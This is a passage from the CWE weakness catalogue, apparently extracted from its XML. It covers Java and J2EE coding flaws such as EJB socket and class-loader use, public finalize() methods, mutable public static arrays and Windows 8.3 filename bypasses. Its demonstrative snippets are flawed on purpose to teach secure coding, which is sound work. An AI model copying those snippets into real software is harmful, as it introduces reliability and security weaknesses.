a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Community + 2006-12-15 + Draft 5 + 2006-12-15 + Submitted by members of the CWE community to extend early CWE versions + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes + + + CWE Content Team + MITRE + 2009-10-29 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2009-12-28 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product violates the Enterprise JavaBeans (EJB) specification by using sockets. + The Enterprise JavaBeans specification requires that every bean provider follow a set of programming guidelines designed to ensure that the bean will be portable and behave consistently in any EJB container. In this case, the product violates the following EJB guideline: "An enterprise bean must not attempt to listen on a socket, accept connections on a socket, or use a socket for multicast." The specification justifies this requirement in the following way: "The EJB architecture allows an enterprise bean instance to be a network socket client, but it does not allow it to be a network server. Allowing the instance to become a network server would conflict with the basic function of the enterprise bean-- to serve the EJB clients." + + + + + + + + + Implementation + + + + + Other + Quality Degradation + + + + + Architecture and Design + Implementation + Do not use Sockets when writing EJBs. + + + + + The following Java example is a simple stateless Enterprise JavaBean that retrieves stock symbols and stock values. The Enterprise JavaBean creates a socket and listens for and accepts connections from clients on the socket. + + @Statelesspublic class StockSymbolBean implements StockSymbolRemote { + + ServerSocket serverSocket = null;Socket clientSocket = null; + public StockSymbolBean() { + try {serverSocket = new ServerSocket(Constants.SOCKET_PORT);} catch (IOException ex) {...} + try {clientSocket = serverSocket.accept();} catch (IOException e) {...} + } + public String getStockSymbol(String name) {...} + public BigDecimal getStockValue(String symbol) {...} + private void processClientInputFromSocket() {...} + } + + And the following Java example is similar to the previous example but demonstrates the use of multicast socket connections within an Enterprise JavaBean. + + @Statelesspublic class StockSymbolBean extends Thread implements StockSymbolRemote { + + ServerSocket serverSocket = null;Socket clientSocket = null;boolean listening = false; + public StockSymbolBean() { + try {serverSocket = new ServerSocket(Constants.SOCKET_PORT);} catch (IOException ex) {...} + listening = true;while(listening) {start();} + } + public String getStockSymbol(String name) {...} + public BigDecimal getStockValue(String symbol) {...} + public void run() {try {clientSocket = serverSocket.accept();} catch (IOException e) {...}...} + + } + + The previous two examples within any type of Enterprise JavaBean violate the EJB specification by attempting to listen on a socket, accepting connections on a socket, or using a socket for multicast. + + + + + SFP3 + Use of an improper API + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Community + 2006-12-15 + Draft 5 + 2006-12-15 + Submitted by members of the CWE community to extend early CWE versions + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes + + + CWE Content Team + MITRE + 2009-10-29 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2009-12-28 + updated Demonstrative_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product violates the Enterprise JavaBeans (EJB) specification by using the class loader. + The Enterprise JavaBeans specification requires that every bean provider follow a set of programming guidelines designed to ensure that the bean will be portable and behave consistently in any EJB container. In this case, the product violates the following EJB guideline: "The enterprise bean must not attempt to create a class loader; obtain the current class loader; set the context class loader; set security manager; create a new security manager; stop the JVM; or change the input, output, and error streams." The specification justifies this requirement in the following way: "These functions are reserved for the EJB container. Allowing the enterprise bean to use these functions could compromise security and decrease the container's ability to properly manage the runtime environment." + + + + + + + + + Implementation + + + + + Confidentiality + Integrity + Availability + Other + Execute Unauthorized Code or Commands + Varies by Context + + + + + Architecture and Design + Implementation + Do not use the Class Loader when writing EJBs. + + + + + The following Java example is a simple stateless Enterprise JavaBean that retrieves the interest rate for the number of points for a mortgage. The interest rates for various points are retrieved from an XML document on the local file system, and the EJB uses the Class Loader for the EJB class to obtain the XML document from the local file system as an input stream. + + @Statelesspublic class InterestRateBean implements InterestRateRemote { + + private Document interestRateXMLDocument = null; + public InterestRateBean() { + try { + + + // get XML document from the local filesystem as an input stream + + + // using the ClassLoader for this class + ClassLoader loader = this.getClass().getClassLoader();InputStream in = loader.getResourceAsStream(Constants.INTEREST_RATE_FILE); + + + + + DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();DocumentBuilder db = dbf.newDocumentBuilder();interestRateXMLDocument = db.parse(interestRateFile);} catch (IOException ex) {...} + } + + public BigDecimal getInterestRate(Integer points) {return getInterestRateFromXML(points);} + + /* member function to retrieve interest rate from XML document on the local file system */ + + private BigDecimal getInterestRateFromXML(Integer points) {...} + } + + This use of the Java Class Loader class within any kind of Enterprise JavaBean violates the restriction of the EJB specification against obtaining the current class loader as this could compromise the security of the application using the EJB. + + + An EJB is also restricted from creating a custom class loader and creating a class and instance of a class from the class loader, as shown in the following example. + + @Statelesspublic class LoaderSessionBean implements LoaderSessionRemote { + + public LoaderSessionBean() {try {ClassLoader loader = new CustomClassLoader();Class c = loader.loadClass("someClass");Object obj = c.newInstance();/* perform some task that uses the new class instance member variables or functions */...} catch (Exception ex) {...}} + public class CustomClassLoader extends ClassLoader { + } + } + + + + + + SFP3 + Use of an improper API + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Community + 2006-12-15 + Draft 5 + 2006-12-15 + Submitted by members of the CWE community to extend early CWE versions + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes + + + CWE Content Team + MITRE + 2009-10-29 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2009-12-28 + updated Demonstrative_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product stores a non-serializable object as an HttpSession attribute, which can hurt reliability. + A J2EE application can make use of multiple JVMs in order to improve application reliability and performance. In order to make the multiple JVMs appear as a single application to the end user, the J2EE container can replicate an HttpSession object across multiple JVMs so that if one JVM becomes unavailable another can step in and take its place without disrupting the flow of the application. This is only possible if all session data is serializable, allowing the session to be duplicated between the JVMs. + + + + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Other + Quality Degradation + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + In order for session replication to work, the values the product stores as attributes in the session must implement the Serializable interface. + + + + + The following class adds itself to the session, but because it is not serializable, the session can no longer be replicated. + + public class DataGlob { + String globName;String globValue; + public void addToSession(HttpSession session) {session.setAttribute("glob", this);} + } + + + + + + SFP1 + Glitch in computation + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Community + 2006-12-15 + Draft 5 + 2006-12-15 + Submitted by members of the CWE community to extend early CWE versions + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product contains a protection mechanism that restricts access to a long filename on a Windows operating system, but it does not properly restrict access to the equivalent short "8.3" filename. + On later Windows operating systems, a file can have a "long name" and a short name that is compatible with older Windows file systems, with up to 8 characters in the filename and 3 characters for the extension. These "8.3" filenames, therefore, act as an alternate name for files with long names, so they are useful pathname equivalence manipulations. + + + + + + + + + + Implementation + + + + + Confidentiality + Integrity + Read Files or Directories + Modify Files or Directories + + + + + System Configuration + Disable Windows from supporting 8.3 filenames by editing the Windows registry. Preventing 8.3 filenames will not remove previously generated 8.3 filenames. + + + + + CVE-1999-0012 + Multiple web servers allow restriction bypass using 8.3 names instead of long names + https://www.cve.org/CVERecord?id=CVE-1999-0012 + + + CVE-2001-0795 + Source code disclosure using 8.3 file name. + https://www.cve.org/CVERecord?id=CVE-2001-0795 + + + CVE-2005-0471 + Multi-Factor Vulnerability. Product generates temporary filenames using long filenames, which become predictable in 8.3 format. + https://www.cve.org/CVERecord?id=CVE-2005-0471 + + + + File Processing + + + + Windows 8.3 Filename + + + SFP16 + Path Traversal + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Probably under-studied. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, References + + + CWE Content Team + MITRE + 2018-03-27 + updated References + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Path Issue - Windows 8.3 Filename + + + + The product contains a clone() method that does not call super.clone() to obtain the new object. + All implementations of clone() should obtain the new object by calling super.clone(). If a class does not follow this convention, a subclass's clone() method will return an object of the wrong type. + + + + + + + + + + Implementation + + + + + Integrity + Other + Unexpected State + Quality Degradation + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Call super.clone() within your clone() method, when obtaining a new object. + + + Implementation + In some cases, you can eliminate the clone method altogether and use copy constructors. + + + + + The following two classes demonstrate a bug introduced by not calling super.clone(). Because of the way Kibitzer implements clone(), FancyKibitzer's clone method will return an object of type Kibitzer instead of FancyKibitzer. + + public class Kibitzer { + public Object clone() throws CloneNotSupportedException { + + Object returnMe = new Kibitzer();... + } + } + public class FancyKibitzer extends Kibitzer{ + public Object clone() throws CloneNotSupportedException { + + Object returnMe = super.clone();... + } + } + + + + + + SFP28 + Unexpected access points + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Community + 2006-12-15 + Draft 5 + 2006-12-15 + Submitted by members of the CWE community to extend early CWE versions + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes + + + CWE Content Team + MITRE + 2009-07-27 + updated Description, Other_Notes, Potential_Mitigations + + + CWE Content Team + MITRE + 2010-12-13 + updated Description + + + CWE Content Team + MITRE + 2011-03-29 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Erroneous Clone Method + + + + The product does not maintain equal hashcodes for equal objects. + Java objects are expected to obey a number of invariants related to equality. One of these invariants is that equal objects must have equal hashcodes. In other words, if a.equals(b) == true then a.hashCode() == b.hashCode(). + + + + + + + + + + Implementation + + + + + Integrity + Other + Other + If this invariant is not upheld, it is likely to cause trouble if objects of this class are stored in a collection. If the objects of the class in question are used as a key in a Hashtable or if they are inserted into a Map or Set, it is critical that equal objects have equal hashcodes. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Both Equals() and Hashcode() should be defined. + + + + + MET09-J + Classes that define an equals() method must also define a hashCode() method + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Community + 2006-12-15 + Draft 5 + 2006-12-15 + Submitted by members of the CWE community to extend early CWE versions + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Other_Notes + + + CWE Content Team + MITRE + 2009-10-29 + updated Common_Consequences, Description, Other_Notes + + + CWE Content Team + MITRE + 2010-12-13 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-03-29 + updated Description + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Object Model Violation: Just One of Equals and Haschode Defined + + + + The product declares an array public, final, and static, which is not sufficient to prevent the array's contents from being modified. + Because arrays are mutable objects, the final constraint requires that the array object itself be assigned only once, but makes no guarantees about the values of the array elements. Since the array is public, a malicious program can change the values stored in the array. As such, in most cases an array declared public, final and static is a bug. + + + + + + Primary + + + + + + + Mobile code, in this case a Java Applet, is code that is transmitted across a network and executed on a remote machine. Because mobile code developers have little if any control of the environment in which their code will execute, special security concerns become relevant. One of the biggest environmental threats results from the risk that the mobile code will run side-by-side with other, potentially malicious, mobile code. Because all of the popular web browsers execute code from multiple sources together in the same JVM, many of the security guidelines for mobile code are focused on preventing manipulation of your objects' state and behavior by adversaries who have access to the same virtual machine where your product is running. + + + + Implementation + + + + + Integrity + Modify Application Data + + + + + Implementation + In most situations the array should be made private. + + + + + The following Java Applet code mistakenly declares an array public, final and static. + + public final class urlTool extends Applet {public final static URL[] urls;...} + + + + + + OBJ10-J + Do not use public static nonfinal variables + + + SFP28 + Unexpected Access Points + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Community + 2006-12-15 + Draft 5 + 2006-12-15 + Submitted by members of the CWE community to extend early CWE versions + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Other_Notes, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2008-10-14 + updated Background_Details, Demonstrative_Examples, Description, Other_Notes + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2022-10-13 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2023-01-31 + updated Background_Details, Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Mobile Code: Unsafe Array Declaration + + + + The product violates secure coding principles for mobile code by declaring a finalize() method public. + A product should never call finalize explicitly, except to call super.finalize() inside an implementation of finalize(). In mobile code situations, the otherwise error prone practice of manual garbage collection can become a security threat if an attacker can maliciously invoke a finalize() method because it is declared with public access. + + + + + + + + + Implementation + + + + + Confidentiality + Integrity + Availability + Alter Execution Logic + Execute Unauthorized Code or Commands + Modify Application Data + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + If you are using finalize() as it was designed, there is no reason to declare finalize() with anything other than protected access. + + + + + The following Java Applet code mistakenly declares a public finalize() method. + + public final class urlTool extends Applet {public void finalize() {...}...} + + Mobile code, in this case a Java Applet, is code that is transmitted across a network and executed on a remote machine. Because mobile code developers have little if any control of the environment in which their code will execute, special security concerns become relevant. One of the biggest environmental threats results from the risk that the mobile code will run side-by-side with other, potentially malicious, mobile code. Because all of the popular web browsers execute code from multiple sources together in the same JVM, many of the security guidelines for mobile code are focused on preventing manipulation of your objects' state and behavior by adversaries who have access to the same virtual machine where your product is running. + + + + + MET12-J + Do not use finalizers + + + SFP28 + Unexpected access points + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Community + 2006-12-15 + Draft 5 + 2006-12-15 + Submitted by members of the CWE community to extend early CWE versions + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-10-29 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Demonstrative_Examples, Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Mobile Code: Public Finalize Method + + + + The code has a return statement inside a finally block, which will cause any thrown exception in the try block to be discarded. + + + + + + Implementation + + + + + Other + Alter Execution Logic + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Do not use a return statement inside the finally block. The finally block should have "cleanup" code. + + + + + In the following code excerpt, the IllegalArgumentException will never be delivered to the caller. The finally block will cause the exception to be discarded. + + try {...throw IllegalArgumentException();}finally {return r;} + + + + + + ERR04-J + Do not complete abruptly from a finally block + + + ERR05-J + Do not let checked exceptions escape from a finally block + + + SFP6 + Incorrect Exception Behavior + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Community + 2006-12-15 + Draft 5 + 2006-12-15 + Submitted by members of the CWE community to extend early CWE versions + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product contains an empty synchronized block. + An empty synchronized block does not actually accomplish any synchronization and may indicate a troubled section of code. An empty synchronized block can occur because code no longer needed within the synchronized block is commented out without removing the synchronized block. + + + + + + Indirect + + + + + + + + Implementation + + + + + Other + Other + An empty synchronized block will wait until nobody else is using the synchronizer being specified. While this may be part of the desired behavior, because you haven't protected the subsequent code by placing it inside the synchronized block, nothing is stopping somebody else from modifying whatever it was you were waiting for while you run the subsequent code. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + When you come across an empty synchronized statement, or a synchronized statement in which the code has been commented out, try to determine what the original intentions were and whether or not the synchronized block is still necessary. + + + + + The following code attempts to synchronize on an object, but does not execute anything in the synchronized block. This does not actually accomplish anything and may be a sign that a programmer is wrestling with synchronization but has not yet achieved the result they intend. + + synchronized(this) { } + + Instead, in a correct usage, the synchronized statement should contain procedures that access or modify data that is exposed to multiple threads. For example, consider a scenario in which several threads are accessing student records at the same time. The method which sets the student ID to a new value will need to make sure that nobody else is accessing this data at the same time and will require synchronization. + + public void setID(int ID){synchronized(this){this.ID = ID;}} + + + + + + SFP21 + Multiple locks/unlocks + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Community + 2006-12-15 + Draft 5 + 2006-12-15 + Submitted by members of the CWE community to extend early CWE versions + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes + + + CWE Content Team + MITRE + 2009-05-27 + updated Common_Consequences, Demonstrative_Examples, Description, Other_Notes, Potential_Mitigations, References + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships, Type + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, References, Relationships, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product makes an explicit call to the finalize() method from outside the finalizer. + While the Java Language Specification allows an object's finalize() method to be called from outside the finalizer, doing so is usually a bad idea. For example, calling finalize() explicitly means that finalize() will be called more than once: the first time will be the explicit call and the last time will be the call that is made after the object is garbage collected. + + + + + + Primary + + + + + + + + Implementation + + + + + Integrity + Other + Unexpected State + Quality Degradation + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Testing + Do not make explicit calls to finalize(). Use static analysis tools to spot such instances. + + + + + The following code fragment calls finalize() explicitly: + + + + // time to clean up + widget.finalize(); + + + + + + MET12-J + Do not use finalizers + + + SFP3 + Use of an improper API + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Community + 2006-12-15 + Draft 5 + 2006-12-15 + Submitted by members of the CWE community to extend early CWE versions + + + Eric Dalci + Cigital + 2008-07-01 + updated Name, Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-10-29 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 